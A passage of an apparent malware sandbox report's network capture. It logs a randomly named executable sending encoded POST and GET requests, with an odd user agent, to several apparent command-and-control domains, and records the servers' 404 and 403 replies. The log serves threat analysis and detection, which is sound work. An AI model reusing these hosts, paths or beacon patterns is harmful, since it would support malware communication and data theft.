                                              Data Raw: 35 38 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 36 75 78 41 61 4f 34 5a 65 38 62 61 52 77 67 43 56 6d 4c 65 6a 4a 61 63 2f 69 5a 2f 45 57 67 4b 50 59 70 34 6f 38 70 6e 34 43 54 69 2f 75 67 65 69 62 74 61 46 56 5a 56 48 37 6a 52 48 78 37 42 59 46 78 6e 50 35 58 4d 6a 64 48 30 67 4e 70 6d 74 6f 4c 4b 2b 63 67 73 42 65 58 47 48 42 34 31 55 79 50 4f 72 72 56 67 63 62 36 57 45 61 52 56 70 6c 72 46 4d 53 67 68 69 49 5a 7a 75 73 79 58 37 52 64 6c 51 42 55 78 38 76 67 2b 5a 54 74 6b 56 67 4d 2b 44 48 54 58 38 33 6e 6d 51 79 53 65 58 39 55 5a 58 44 2b 43 7a 33 52 78 70 35 74 30 30 38 41 6a 51 5a 2f 4e 73 62 56 73 4f 53 62 44 4a 73 6d 2b 45 56 56 30 50 73 35 76 2b 61 52 45 63 36 6b 6a 55 49 55 33 52 68 49 2f 67 53 47 70 32 54 74 59 2f 36 6e 42 2f 30 42 71 55 50 62 47 70 75 37 6c 46 66 38 57 2f 48 4a 5a 71 67 55 59 74 6b 4d 34 35 6f 76 75 52 6b 73 65 56 78 33 6d 76 47 31 4b 31 68 31 4b 52 54 42 41 75 49 70 5a 32 43 6a 66 54 73 [TRUNCATED]
                                              Data Ascii: 58=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO6uxAaO4Ze8baRwgCVmLejJac/iZ/EWgKPYp4o8pn4CTi/ugeibtaFVZVH7jRHx7BYFxnP5XMjdH0gNpmtoLK+cgsBeXGHB41UyPOrrVgcb6WEaRVplrFMSghiIZzusyX7RdlQBUx8vg+ZTtkVgM+DHTX83nmQySeX9UZXD+Cz3Rxp5t008AjQZ/NsbVsOSbDJsm+EVV0Ps5v+aREc6kjUIU3RhI/gSGp2TtY/6nB/0BqUPbGpu7lFf8W/HJZqgUYtkM45ovuRkseVx3mvG1K1h1KRTBAuIpZ2CjfTsh1Y9GqXOBdmuJQAnbrHDdPzTcNlkp1iyEEcsqavMKh3TZj9w3aUyCuzGtmQbPSrdQug+E6+pL8orrFFNhj7SjjSdn2b8Ot2zg7LtLP7o8T+WbR2tt2V4OE/enr8zLfeSdheXwJZorjy5mNaqg72KeT4vXl5p4Xkx2nFnbnp2fmZo7fqt7e7MDLZ8WMSsLlE87vpxqO8g46QF0XJgy7RyRrb9y4kA8Mlc3u6X7GrJp13JkQGWnxkngAyBARzhY637HBMS3LkNg79beyWyw+C1CefkL57T5UxOes5+oLYtcQo0Z3MuWYi2dLTuE57xd39Y1uE81bjX3xkCvZk37prwYMf1sX19m+oPbKn7j8r6uDA9VIAjEGgqbVeKOJCZ81X5dk9iYBxLK7VLtUdf+KZtFxNbdZXCcNQnLVcJb1pSGB8zVV7124+qXYcbqY6lcf+jYQgSHGjfq9cOMHgBdlv/lS+Drd2vZOpXzm77c/6YZiIu4u8IaNu0PC2nBOiLLBXgKD+Tx12/CwLXVsCSWLoBmRdZqpX4LW2WHqNZL5/6QzlN5VvRh8aaUSFpt3QezxRtxbq43hNHqEnL2dVzDDc1z62A2dg69126aLA4+2Z/mvlQvdkM9BCK8TbjaPlvULNtNnpsildfhmFuNnnvTUpq6JITqoblUgTjFU [TRUNCATED]
                                              Jan 2, 2025 09:19:38.862749100 CET312INHTTP/1.1 404 Not Found
                                              Content-Length: 148
                                              Content-Type: text/html
                                              Date: Thu, 02 Jan 2025 08:19:38 GMT
                                              Etag: "6743f11f-94"
                                              Server: nginx
                                              Connection: close
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.649995154.21.203.24803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:40.535661936 CET490OUTGET /a59t/?58=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgIazDBG/TFF/REucHmN8GJFpkvs6MD1/91Qml7NfLeQ7pQK3fwg=&AZhlI=2P00kRyHXnBDvT HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.44756.pizza
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 2, 2025 09:19:41.384452105 CET312INHTTP/1.1 404 Not Found
                                              Content-Length: 148
                                              Content-Type: text/html
                                              Date: Thu, 02 Jan 2025 08:19:41 GMT
                                              Etag: "6743f11f-94"
                                              Server: nginx
                                              Connection: close
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.649997199.192.21.169803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:46.438271046 CET745OUTPOST /bowc/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.lonfor.website
                                              Origin: http://www.lonfor.website
                                              Cache-Control: max-age=0
                                              Content-Length: 207
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.lonfor.website/bowc/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 32 52 33 7a 4d 6c 6e 6a 59 46 6c 72 4e 75 54 7a 59 4d 4b 68 71 66 4e 4a 46 46 6b 31 4c 56 54 47 68 48 6c 55 68 56 59 35 77 31 41 51 65 59 78 38 35 57 4f 49 78 4d 4e 43 4e 64 6f 36 35 61 59 6d 52 6f 47 6a 73 44 6d 38 4d 56 30 63 63 58 43 5a 4e 4d 65 77 2f 41 58 4d 4e 53 78 42 66 67 61 74 50 34 75 50 54 59 47 7a 38 49 6e 69 4c 41 70 48 31 4d 6f 68 73 58 61 49 68 42 61 4b 4a 46 59 2f 6c 59 4f 36 4c 65 62 44 78 77 34 7a 30 6d 45 48 69 73 41 4f 6f 44 38 52 33 6e 59 4a 79 52 42 61 66 66 65 7a 43 33 41 6d 4c 48 6c 31 6c 39 56 62 51 61 72 48 6d 52 4e 55 59 45 78 32 7a 57 4d
                                              Data Ascii: 58=sQtSC1b/Ma16y2R3zMlnjYFlrNuTzYMKhqfNJFFk1LVTGhHlUhVY5w1AQeYx85WOIxMNCNdo65aYmRoGjsDm8MV0ccXCZNMew/AXMNSxBfgatP4uPTYGz8IniLApH1MohsXaIhBaKJFY/lYO6LebDxw4z0mEHisAOoD8R3nYJyRBaffezC3AmLHl1l9VbQarHmRNUYEx2zWM
                                              Jan 2, 2025 09:19:47.021203041 CET918INHTTP/1.1 404 Not Found
                                              Date: Thu, 02 Jan 2025 08:19:46 GMT
                                              Server: Apache
                                              Content-Length: 774
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.649998199.192.21.169803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:48.994499922 CET769OUTPOST /bowc/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.lonfor.website
                                              Origin: http://www.lonfor.website
                                              Cache-Control: max-age=0
                                              Content-Length: 231
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.lonfor.website/bowc/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 78 54 48 41 33 6c 56 6c 68 59 30 51 31 41 46 75 59 77 2f 4a 57 2f 49 78 41 46 43 4d 68 6f 36 39 79 59 6d 51 59 47 69 62 2f 6c 39 63 56 79 4a 4d 58 41 58 74 4d 65 77 2f 41 58 4d 4a 44 35 42 66 34 61 74 2b 49 75 4f 78 38 4a 74 73 49 6b 6c 4c 41 70 57 6c 4d 73 68 73 58 34 49 6b 5a 67 4b 4d 42 59 2f 6e 41 4f 36 5a 32 61 4a 78 77 69 39 55 6e 6f 42 69 34 45 41 4b 61 50 58 42 72 48 49 79 4e 78 62 70 43 45 76 78 33 6a 30 62 6e 6e 31 6e 6c 6e 62 77 61 42 46 6d 70 4e 47 50 49 57 35 48 7a 76 4f 2f 55 72 66 62 79 68 47 58 35 45 57 2f 68 50 30 34 55 6f 56 51 3d 3d
                                              Data Ascii: 58=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10ppxTHA3lVlhY0Q1AFuYw/JW/IxAFCMho69yYmQYGib/l9cVyJMXAXtMew/AXMJD5Bf4at+IuOx8JtsIklLApWlMshsX4IkZgKMBY/nAO6Z2aJxwi9UnoBi4EAKaPXBrHIyNxbpCEvx3j0bnn1nlnbwaBFmpNGPIW5HzvO/UrfbyhGX5EW/hP04UoVQ==
                                              Jan 2, 2025 09:19:49.597086906 CET918INHTTP/1.1 404 Not Found
                                              Date: Thu, 02 Jan 2025 08:19:49 GMT
                                              Server: Apache
                                              Content-Length: 774
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.649999199.192.21.169803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:51.538448095 CET1782OUTPOST /bowc/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.lonfor.website
                                              Origin: http://www.lonfor.website
                                              Cache-Control: max-age=0
                                              Content-Length: 1243
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.lonfor.website/bowc/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 35 54 47 79 50 6c 56 43 39 59 31 51 31 41 5a 2b 59 31 2f 4a 57 69 49 31 73 42 43 4d 74 53 36 37 32 59 33 43 67 47 6c 71 2f 6c 6b 73 56 79 52 38 58 46 5a 4e 4d 78 77 2b 73 4c 4d 4e 6e 35 42 66 34 61 74 38 51 75 4e 6a 59 4a 76 73 49 6e 69 4c 41 62 48 31 4d 55 68 73 76 43 49 6b 74 77 4b 59 31 59 2f 48 51 4f 35 71 65 61 54 78 77 6b 36 55 6e 77 42 69 6c 61 41 4b 58 38 58 42 33 39 49 7a 31 78 62 74 72 77 78 6a 6a 30 68 71 33 77 6f 6d 52 34 54 47 61 4b 4c 56 56 4b 47 4d 6f 33 79 47 72 73 41 4a 49 64 62 64 69 69 49 6b 55 76 49 76 77 77 31 61 42 64 4b 4c 75 51 62 50 55 66 4d 68 68 6e 2f 70 59 56 43 56 79 69 51 6c 31 55 78 6d 58 58 39 33 76 71 6e 6d 32 43 44 4a 50 39 4c 33 71 46 45 61 31 6e 30 57 77 37 57 6d 79 4f 79 37 47 53 32 70 54 78 34 4e 2f 35 51 44 31 68 76 47 4f 39 37 6f 54 49 76 51 53 53 2b 35 65 6b 75 79 70 76 74 76 46 42 5a 68 48 66 67 30 4d 2f 47 71 71 62 35 6b 2f [TRUNCATED]
                                              Data Ascii: 58=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10pp5TGyPlVC9Y1Q1AZ+Y1/JWiI1sBCMtS672Y3CgGlq/lksVyR8XFZNMxw+sLMNn5Bf4at8QuNjYJvsIniLAbH1MUhsvCIktwKY1Y/HQO5qeaTxwk6UnwBilaAKX8XB39Iz1xbtrwxjj0hq3womR4TGaKLVVKGMo3yGrsAJIdbdiiIkUvIvww1aBdKLuQbPUfMhhn/pYVCVyiQl1UxmXX93vqnm2CDJP9L3qFEa1n0Ww7WmyOy7GS2pTx4N/5QD1hvGO97oTIvQSS+5ekuypvtvFBZhHfg0M/Gqqb5k/a2UWaMn2vIO2vVWSopFXvVknQqOkNmnQqVvbPx/kmWMUZ9a822RasmCVVLpcTynTbVzEIa8OQanmKAk5kFtr+VEYkm4uQsHu9i0HFiK5zs18J6pLKHZjGV81EQE2Y1eGIZ00I2MQYTIgn02J/cSqzsFf1bv6ODuiS2xR5x5VcDDD8V55ypSZ5xXAbUt3uzwReoP5ETZzKp/yBidTCIw8N58rYAj2BFjILyx3U4LqPWsa6SYA974iyHT0JDCGZ+seWIbqjy5od10kMT+HzqvyO8ZYAynj4+bjt/5CIO82Ddw8II+zTjD9d2iFdDrdUDL61OxN3/uEpwcqHLrYZzK9af8JlzxloY2v/jb4LYHA91RV38nIFqdLFGhBjZ3xoH1wGNylh5+jnrTc5FCCIl+GcghOqg10kHWq+HMihQ2VqE2zF/UT0t1OUP9fTiyhB65xMvfvm0ZoOA0tx0i/4vOYH3dJPbYww2Bfq0uHsXhM4iDCcGSQWB83c2P/Oduf5FGDDaztJLQJmdhNsXxYdeHY+TDn8zgtNb6lA3ArOoR1Os1rCcAZXAeUwdATmzsq6O9lObpUtOrDDOUhIvc9Th+RpgGdG1v0i2StEzEVFGV376nLLL9V2h6ZxVzROorPgqSWas2FuKkEjekdMU1D6kROggcNJVCujnG3Hj [TRUNCATED]
                                              Jan 2, 2025 09:19:52.123641968 CET918INHTTP/1.1 404 Not Found
                                              Date: Thu, 02 Jan 2025 08:19:52 GMT
                                              Server: Apache
                                              Content-Length: 774
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.650000199.192.21.169803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:54.082953930 CET493OUTGET /bowc/?AZhlI=2P00kRyHXnBDvT&58=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwYRaJOa9Z44z2qtPWfGvKNoA9tlUfzwY1s4wtqx/AHoNma7bQRw= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.lonfor.website
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 2, 2025 09:19:54.705404043 CET933INHTTP/1.1 404 Not Found
                                              Date: Thu, 02 Jan 2025 08:19:54 GMT
                                              Server: Apache
                                              Content-Length: 774
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.650001154.197.162.239803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:20:00.122782946 CET751OUTPOST /cf9p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.investshares.net
                                              Origin: http://www.investshares.net
                                              Cache-Control: max-age=0
                                              Content-Length: 207
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.investshares.net/cf9p/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6c 48 6e 6c 4e 62 61 71 65 77 6a 78 50 63 30 4f 79 57 33 70 43 6f 68 32 4e 59 6a 70 61 65 4f 69 38 61 79 55 6f 4e 36 69 43 71 32 7a 75 6e 70 76 74 38 4c 41 44 65 74 74 48 37 73 77 65 62 78 51 62 75 55 59 46 65 2f 62 42 4a 2f 58 67 4d 44 66 64 4c 73 67 42 66 4c 32 39 43 52 30 30 77 78 79 41 39 42 7a 43 4f 42 67 57 52 71 70 54 7a 65 48 75 68 31 51 38 39 72 6b 65 59 7a 45 4a 4c 43 6c 65 42 71 69 35 38 36 68 35 6f 34 75 47 37 31 4c 52 61 4b 49 49 41 6f 2f 61 6c 46 62 67 64 35 61 77 78 2b 42 65 6d 59 52 51 62 47 54 70 63 32 77 50 2b 36 50 56 61 71 43 42 39 34 61 47 33 4d 47
                                              Data Ascii: 58=gmPPOGT6pgqjlHnlNbaqewjxPc0OyW3pCoh2NYjpaeOi8ayUoN6iCq2zunpvt8LADettH7swebxQbuUYFe/bBJ/XgMDfdLsgBfL29CR00wxyA9BzCOBgWRqpTzeHuh1Q89rkeYzEJLCleBqi586h5o4uG71LRaKIIAo/alFbgd5awx+BemYRQbGTpc2wP+6PVaqCB94aG3MG
                                              Jan 2, 2025 09:20:00.687302113 CET309INHTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Wed, 01 Jan 2025 16:19:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
